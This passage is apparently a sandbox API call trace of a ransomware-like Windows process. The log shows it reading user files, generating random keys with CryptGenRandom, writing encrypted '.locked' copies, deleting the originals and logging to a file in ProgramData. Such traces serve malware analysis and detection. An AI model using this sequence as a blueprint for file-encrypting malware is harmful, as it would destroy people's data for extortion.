hFile=0x1c0, lpBuffer=0x126e3000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12669d78, lpOverlapped=0x0 | out: lpBuffer=0x126e3000*, lpNumberOfBytesWritten=0x12669d78*=0x80, lpOverlapped=0x0) returned 1 [0304.065] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0x1) returned 0x0 [0304.066] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x32dafb30, ulCount=0x10, ulNumEntriesRemoved=0x32dafb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x32dafb30, ulNumEntriesRemoved=0x32dafb10) returned 0 [0304.066] SetEvent (hEvent=0x190) returned 1 [0304.066] SetEvent (hEvent=0x1dc) returned 1 [0304.066] SetEvent (hEvent=0x12c) returned 1 [0304.066] ReadFile (in: hFile=0x19c, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12669d68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x12669d68*=0x10f9e, lpOverlapped=0x0) returned 1 [0304.071] WriteFile (in: hFile=0x1c0, lpBuffer=0x12770000*, nNumberOfBytesToWrite=0x10f9e, lpNumberOfBytesWritten=0x12669d74, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesWritten=0x12669d74*=0x10f9e, lpOverlapped=0x0) returned 1 [0304.133] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0304.153] SetEvent (hEvent=0x150) returned 1 [0304.153] SetEvent (hEvent=0x20c) returned 1 [0304.153] ReadFile (in: hFile=0x19c, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12669d68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x12669d68*=0x0, lpOverlapped=0x0) returned 1 [0304.154] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0304.303] CloseHandle (hObject=0x1c0) returned 1 [0304.331] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0304.503] CloseHandle (hObject=0x19c) returned 1 [0304.504] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0304.504] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x12669e94 | out: lpMode=0x12669e94) returned 0 [0304.504] WriteFile (in: hFile=0x19c, lpBuffer=0x125ee060*, nNumberOfBytesToWrite=0x52, lpNumberOfBytesWritten=0x12669e64, lpOverlapped=0x0 | out: lpBuffer=0x125ee060*, lpNumberOfBytesWritten=0x12669e64*=0x52, lpOverlapped=0x0) returned 1 [0304.504] CloseHandle (hObject=0x19c) returned 1 [0304.506] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\EzlWVPEgGWw7Xy7.ods" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\ezlwvpeggww7xy7.ods")) returned 1 [0304.618] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0304.660] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0304.661] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0305.424] SetEvent (hEvent=0x104) returned 1 [0305.425] SetEvent (hEvent=0x14c) returned 1 [0305.425] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0305.440] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0305.508] SetEvent (hEvent=0x1ac) returned 1 [0305.508] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0305.620] SetEvent (hEvent=0x1dc) returned 1 [0305.620] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0306.784] SetEvent (hEvent=0x184) returned 1 [0306.784] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0306.787] SetEvent (hEvent=0x20c) returned 1 [0306.787] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0307.565] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e040 | out: pbBuffer=0x1263e040) returned 1 [0307.565] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766020 | out: pbBuffer=0x12766020) returned 1 [0307.565] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12714181 | out: pbBuffer=0x12714181) returned 1 [0307.565] WriteFile (in: hFile=0x1c0, lpBuffer=0x12621000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1239dd78, lpOverlapped=0x0 | out: lpBuffer=0x12621000*, lpNumberOfBytesWritten=0x1239dd78*=0x80, lpOverlapped=0x0) returned 1 [0307.568] ReadFile (in: hFile=0x1c8, lpBuffer=0x15e96000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239dd68, lpOverlapped=0x0 | out: lpBuffer=0x15e96000*, lpNumberOfBytesRead=0x1239dd68*=0x413b, lpOverlapped=0x0) returned 1 [0307.570] WriteFile (in: hFile=0x1c0, lpBuffer=0x15e96000*, nNumberOfBytesToWrite=0x413b, lpNumberOfBytesWritten=0x1239dd74, lpOverlapped=0x0 | out: lpBuffer=0x15e96000*, lpNumberOfBytesWritten=0x1239dd74*=0x413b, lpOverlapped=0x0) returned 1 [0307.637] ReadFile (in: hFile=0x1c8, lpBuffer=0x15e96000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239dd68, lpOverlapped=0x0 | out: lpBuffer=0x15e96000*, lpNumberOfBytesRead=0x1239dd68*=0x0, lpOverlapped=0x0) returned 1 [0307.637] CloseHandle (hObject=0x1c0) returned 1 [0307.656] CloseHandle (hObject=0x1c8) returned 1 [0307.656] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0307.656] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x1239de94 | out: lpMode=0x1239de94) returned 0 [0307.656] WriteFile (in: hFile=0x1c8, lpBuffer=0x123802c0*, nNumberOfBytesToWrite=0x3c, lpNumberOfBytesWritten=0x1239de64, lpOverlapped=0x0 | out: lpBuffer=0x123802c0*, lpNumberOfBytesWritten=0x1239de64*=0x3c, lpOverlapped=0x0) returned 1 [0307.656] CloseHandle (hObject=0x1c8) returned 1 [0307.658] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\i4iTuepd632fb1KkZ.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\i4ituepd632fb1kkz.pptx")) returned 1 [0307.708] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0307.885] SetEvent (hEvent=0x12c) returned 1 [0307.885] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0307.890] SetEvent (hEvent=0x220) returned 1 [0307.890] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0307.965] SetEvent (hEvent=0x104) returned 1 [0307.965] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0308.158] SetEvent (hEvent=0x1f0) returned 1 [0308.158] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0308.355] SetEvent (hEvent=0x104) returned 1 [0308.355] SetEvent (hEvent=0x1f0) returned 1 [0308.356] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0308.549] SetEvent (hEvent=0x1b8) returned 1 [0308.549] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0308.563] SetEvent (hEvent=0x134) returned 1 [0308.563] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0308.610] SetEvent (hEvent=0x134) returned 1 [0308.611] SetEvent (hEvent=0x104) returned 1 [0308.611] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0308.707] SetEvent (hEvent=0x1e8) returned 1 [0308.707] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0308.750] SetEvent (hEvent=0x220) returned 1 [0308.750] SetEvent (hEvent=0x1f0) returned 1 [0308.751] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0308.774] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0309.154] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x1249fe94 | out: lpMode=0x1249fe94) returned 0 [0309.154] WriteFile (in: hFile=0x230, lpBuffer=0x1234a200*, nNumberOfBytesToWrite=0x3c, lpNumberOfBytesWritten=0x1249fe64, lpOverlapped=0x0 | out: lpBuffer=0x1234a200*, lpNumberOfBytesWritten=0x1249fe64*=0x3c, lpOverlapped=0x0) returned 1 [0309.323] CloseHandle (hObject=0x230) returned 1 [0309.330] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\shxQYJ mAX35K2VsG.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\shxqyj max35k2vsg.xlsx")) returned 1 [0309.413] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0309.414] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0309.416] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0309.873] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0309.937] SetEvent (hEvent=0x220) returned 1 [0309.937] SetEvent (hEvent=0x104) returned 1 [0309.937] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0310.114] SetEvent (hEvent=0x220) returned 1 [0310.114] SetEvent (hEvent=0x1b8) returned 1 [0310.114] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0310.162] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0310.166] SetEvent (hEvent=0x214) returned 1 [0310.166] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0310.348] SetEvent (hEvent=0x190) returned 1 [0310.348] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0310.379] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc020*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x123a1a24, lpReserved=0x0 | out: lpBuffer=0x125fc020*, lpNumberOfCharsWritten=0x123a1a24*=0xc) returned 1 [0310.439] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\ZvLJyDLOgo\\YibDx1iNotnzBWQf\\8GJ8o0z9Qy_3x90hPI8\\yjOkz_fxpa.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\zvljydlogo\\yibdx1inotnzbwqf\\8gj8o0z9qy_3x90hpi8\\yjokz_fxpa.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0310.440] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x123a1d9c | out: lpMode=0x123a1d9c) returned 0 [0310.440] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\ZvLJyDLOgo\\YibDx1iNotnzBWQf\\8GJ8o0z9Qy_3x90hPI8\\yjOkz_fxpa.wav.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\zvljydlogo\\yibdx1inotnzbwqf\\8gj8o0z9qy_3x90hpi8\\yjokz_fxpa.wav.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0310.781] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x123a1d9c | out: lpMode=0x123a1d9c) returned 0 [0310.781] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e000 | out: pbBuffer=0x1263e000) returned 1 [0310.781] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766040 | out: pbBuffer=0x12766040) returned 1 [0310.781] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702201 | out: pbBuffer=0x12702201) returned 1 [0310.781] WriteFile (in: hFile=0x200, lpBuffer=0x12719000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x123a1d78, lpOverlapped=0x0 | out: lpBuffer=0x12719000*, lpNumberOfBytesWritten=0x123a1d78*=0x80, lpOverlapped=0x0) returned 1 [0310.786] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0x1) returned 0x102 [0310.789] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0310.789] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x32dafb30, ulCount=0x10, ulNumEntriesRemoved=0x32dafb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x32dafb30, ulNumEntriesRemoved=0x32dafb10) returned 0 [0310.789] SetEvent (hEvent=0x150) returned 1 [0310.789] SetEvent (hEvent=0x1e8) returned 1 [0310.789] SetEvent (hEvent=0x190) returned 1 [0310.789] SetEvent (hEvent=0x20c) returned 1 [0310.789] ReadFile (in: hFile=0x218, lpBuffer=0x13b36000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x123a1d68, lpOverlapped=0x0 | out: lpBuffer=0x13b36000*, lpNumberOfBytesRead=0x123a1d68*=0x1d6b, lpOverlapped=0x0) returned 1 [0310.791] WriteFile (in: hFile=0x200, lpBuffer=0x13b36000*, nNumberOfBytesToWrite=0x1d6b, lpNumberOfBytesWritten=0x123a1d74, lpOverlapped=0x0 | out: lpBuffer=0x13b36000*, lpNumberOfBytesWritten=0x123a1d74*=0x1d6b, lpOverlapped=0x0) returned 1 [0310.795] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0310.968] ReadFile (in: hFile=0x218, lpBuffer=0x13b36000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x123a1d68, lpOverlapped=0x0 | out: lpBuffer=0x13b36000*, lpNumberOfBytesRead=0x123a1d68*=0x0, lpOverlapped=0x0) returned 1 [0310.968] CloseHandle (hObject=0x200) returned 1 [0310.969] CloseHandle (hObject=0x218) returned 1 [0310.969] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0310.969] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x123a1e94 | out: lpMode=0x123a1e94) returned 0 [0310.969] WriteFile (in: hFile=0x218, lpBuffer=0x125a6120*, nNumberOfBytesToWrite=0x8a, lpNumberOfBytesWritten=0x123a1e64, lpOverlapped=0x0 | out: lpBuffer=0x125a6120*, lpNumberOfBytesWritten=0x123a1e64*=0x8a, lpOverlapped=0x0) returned 1 [0310.970] CloseHandle (hObject=0x218) returned 1 [0310.970] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\ZvLJyDLOgo\\YibDx1iNotnzBWQf\\8GJ8o0z9Qy_3x90hPI8\\yjOkz_fxpa.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\zvljydlogo\\yibdx1inotnzbwqf\\8gj8o0z9qy_3x90hpi8\\yjokz_fxpa.wav")) returned 1 [0310.988] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0311.470] SetEvent (hEvent=0x134) returned 1 [0311.470] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0311.472] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0311.508] SetEvent (hEvent=0x1ac) returned 1 [0311.508] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0311.564] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\ZvLJyDLOgo\\YibDx1iNotnzBWQf\\8GJ8o0z9Qy_3x90hPI8\\tTnyiBf8Er6HDgClHWhw.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\zvljydlogo\\yibdx1inotnzbwqf\\8gj8o0z9qy_3x90hpi8\\ttnyibf8er6hdgclhwhw.wav"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0311.829] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0312.412] SetEvent (hEvent=0x1dc) returned 1 [0312.412] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x125dbe88 | out: lpMode=0x125dbe88) returned 0 [0312.412] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0312.493] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0312.496] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0312.539] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0312.542] SetEvent (hEvent=0x14c) returned 1 [0312.543] SetEvent (hEvent=0x1f0) returned 1 [0312.543] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0313.396] SetEvent (hEvent=0x1f0) returned 1 [0313.396] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0315.362] SetEvent (hEvent=0x20c) returned 1 [0315.362] SetEvent (hEvent=0x190) returned 1 [0315.362] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0315.859] SetEvent (hEvent=0x1e8) returned 1 [0315.859] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e020*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x125e1a24, lpReserved=0x0 | out: lpBuffer=0x1263e020*, lpNumberOfCharsWritten=0x125e1a24*=0xc) returned 1 [0315.867] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0315.920] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\wW1ws0e\\di-h-v4MS65pv.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\ww1ws0e\\di-h-v4ms65pv.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0315.920] GetConsoleMode (in: hConsoleHandle=0x1c0, lpMode=0x125e1d9c | out: lpMode=0x125e1d9c) returned 0 [0315.920] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\wW1ws0e\\di-h-v4MS65pv.png.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\ww1ws0e\\di-h-v4ms65pv.png.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0315.921] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x125e1d9c | out: lpMode=0x125e1d9c) returned 0 [0315.921] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e000 | out: pbBuffer=0x1263e000) returned 1 [0315.921] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8050 | out: pbBuffer=0x124a8050) returned 1 [0315.921] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12340401 | out: pbBuffer=0x12340401) returned 1 [0315.921] WriteFile (in: hFile=0x1e0, lpBuffer=0x126c7000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x125e1d78, lpOverlapped=0x0 | out: lpBuffer=0x126c7000*, lpNumberOfBytesWritten=0x125e1d78*=0x80, lpOverlapped=0x0) returned 1 [0315.924] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0x1) returned 0x0 [0315.930] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x32dafb30, ulCount=0x10, ulNumEntriesRemoved=0x32dafb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x32dafb30, ulNumEntriesRemoved=0x32dafb10) returned 0 [0315.930] SetEvent (hEvent=0x150) returned 1 [0315.930] SetEvent (hEvent=0x214) returned 1 [0315.930] SetEvent (hEvent=0x1b8) returned 1 [0315.930] SetEvent (hEvent=0x184) returned 1 [0315.930] ReadFile (in: hFile=0x1c0, lpBuffer=0x13566000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e1d68, lpOverlapped=0x0 | out: lpBuffer=0x13566000*, lpNumberOfBytesRead=0x125e1d68*=0x16097, lpOverlapped=0x0) returned 1 [0315.935] WriteFile (in: hFile=0x1e0, lpBuffer=0x13566000*, nNumberOfBytesToWrite=0x16097, lpNumberOfBytesWritten=0x125e1d74, lpOverlapped=0x0 | out: lpBuffer=0x13566000*, lpNumberOfBytesWritten=0x125e1d74*=0x16097, lpOverlapped=0x0) returned 1 [0315.999] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0316.090] ReadFile (in: hFile=0x1c0, lpBuffer=0x13566000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e1d68, lpOverlapped=0x0 | out: lpBuffer=0x13566000*, lpNumberOfBytesRead=0x125e1d68*=0x0, lpOverlapped=0x0) returned 1 [0316.091] CloseHandle (hObject=0x1e0) returned 1 [0316.091] CloseHandle (hObject=0x1c0) returned 1 [0316.091] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0316.091] GetConsoleMode (in: hConsoleHandle=0x1c0, lpMode=0x125e1e94 | out: lpMode=0x125e1e94) returned 0 [0316.091] WriteFile (in: hFile=0x1c0, lpBuffer=0x12380180*, nNumberOfBytesToWrite=0x3e, lpNumberOfBytesWritten=0x125e1e64, lpOverlapped=0x0 | out: lpBuffer=0x12380180*, lpNumberOfBytesWritten=0x125e1e64*=0x3e, lpOverlapped=0x0) returned 1 [0316.091] CloseHandle (hObject=0x1c0) returned 1 [0316.092] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\wW1ws0e\\di-h-v4MS65pv.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\ww1ws0e\\di-h-v4ms65pv.png")) returned 1 [0316.126] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0316.375] SetEvent (hEvent=0x1dc) returned 1 [0316.375] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0316.393] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0316.430] SetEvent (hEvent=0x22c) returned 1 [0316.430] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0316.510] SetEvent (hEvent=0x1ac) returned 1 [0316.510] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0316.513] SetEvent (hEvent=0x1e8) returned 1 [0316.513] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0317.513] SetEvent (hEvent=0x190) returned 1 [0317.513] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0317.990] SetEvent (hEvent=0x1e8) returned 1 [0317.990] SetEvent (hEvent=0x1f0) returned 1 [0317.990] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0318.058] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0318.078] SetEvent (hEvent=0x214) returned 1 [0318.079] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0318.250] SetEvent (hEvent=0x1dc) returned 1 [0318.251] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0x1) returned 0x102 [0318.253] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0318.253] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0x1) returned 0x0 [0318.253] SetEvent (hEvent=0x1dc) returned 1 [0318.253] SetEvent (hEvent=0x1b8) returned 1 [0318.253] SetEvent (hEvent=0x184) returned 1 [0318.253] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0318.254] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x32dafb34, ulCount=0x10, ulNumEntriesRemoved=0x32dafb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x32dafb34, ulNumEntriesRemoved=0x32dafb14) returned 0 [0318.254] SetEvent (hEvent=0x1dc) returned 1 [0318.254] SetEvent (hEvent=0x1b8) returned 1 [0318.254] SetEvent (hEvent=0x184) returned 1 [0318.254] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12390020*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x12631a24, lpReserved=0x0 | out: lpBuffer=0x12390020*, lpNumberOfCharsWritten=0x12631a24*=0xc) returned 1 [0318.255] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\JhoWTUZ3 EhtG71Sl-.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\jhowtuz3 ehtg71sl-.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0318.255] GetConsoleMode (in: hConsoleHandle=0x1c0, lpMode=0x12631d9c | out: lpMode=0x12631d9c) returned 0 [0318.255] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\JhoWTUZ3 EhtG71Sl-.mp4.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\jhowtuz3 ehtg71sl-.mp4.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x224 [0318.632] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0318.657] GetConsoleMode (in: hConsoleHandle=0x224, lpMode=0x12631d9c | out: lpMode=0x12631d9c) returned 0 [0318.657] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0318.691] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0318.692] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0318.694] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c2a0*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x12657a24, lpReserved=0x0 | out: lpBuffer=0x1234c2a0*, lpNumberOfCharsWritten=0x12657a24*=0xc) returned 1 [0318.732] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0318.805] SetEvent (hEvent=0x134) returned 1 [0318.805] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0318.810] WaitForSingleObject 